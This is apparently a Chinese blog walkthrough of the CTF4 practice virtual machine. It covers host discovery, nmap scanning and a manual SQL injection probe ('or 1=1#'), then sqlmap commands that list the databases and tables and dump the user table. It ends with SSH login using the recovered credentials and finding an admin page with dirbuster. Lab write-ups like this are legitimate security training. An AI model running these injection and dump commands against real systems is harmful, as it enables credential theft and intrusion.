环境搭建
攻击机:kali
靶机:CTF4
CTF4靶机靶机下载 点击直接下载.
Tips:首次打开虚拟机时要选择“我已移动该虚拟机”选项。
此次训练其中一步为获取目标的账号密码,故目标环境无需登录。
kali和ctf4 都设置为NAT模式
实战演练
主机发现
kali的IP:192.168.99.132
使用netdiscover命令寻找ctf4的IP:
netdiscover -r 192.168.99.0/24
扫描结果如下:
![在这里插入图片描述](https://img-blog.csdnimg.cn/20210126125254589.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzMzUxMjky,size_16,color_FFFFFF,t_70
端口扫描
nmap 192.168.99.141 -v -sV
默认扫描1-1000端口
-v显示扫描细节
-sV显示版本信息
22、25、80、631端口开放
使用浏览器访问一下ctf4:
![在这里插入图片描述](https://img-blog.csdnimg.cn/20210126125638129.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzMzUxMjky,size_16,color_FFFFFF,t_70
寻找突破点
查看了各个网页发现在Blog中存在SQL注入点
点后链接改变出现id参数:
加一个 ’
看看是否存在sql注入,发现网页返回报错,并且报了目录:
改变id值=3时无法访问该页面:
改变 id=3 or 1=1# 后可以访问
由此找到一个sql注入点,利用sqlmap进行利用
sqlmap进行漏洞利用
sql注入漏洞探测
sqlmap -u "http://192.168.99.141/index.html?page=blog&title=Blog&id=3" -p id
存在布尔注入和时间报错注入
爆库名
oot@kali:~# sqlmap -u "http://192.168.99.141/index.html?page=blog&title=Blog&id=3" -p id --dbs
爆表名
sqlmap -u "http://192.168.99.141/index.html?page=blog&title=Blog&id=3" -p id -D ehks --tables
脱库
sqlmap -u "http://192.168.99.141/index.html?page=blog&title=Blog&id=3" -p id -D ehks -T user --dump
爆出了用户名和密码
使用ssh登录
使用dstevens用户登录
尝试提权,居然成功了,太low了
寻找后台
使用dirbuster寻找网站的一些二级目录:
扫到amdin/login.php
在浏览器中输入如下ulr,进入了后台登录界面,输入爆破的用户名和密码即可进入后台管理。
可以上传文字,可能存在xss等漏洞
其他的一些利用
发现可以包含文件,可进一步发掘文件包含漏洞
结束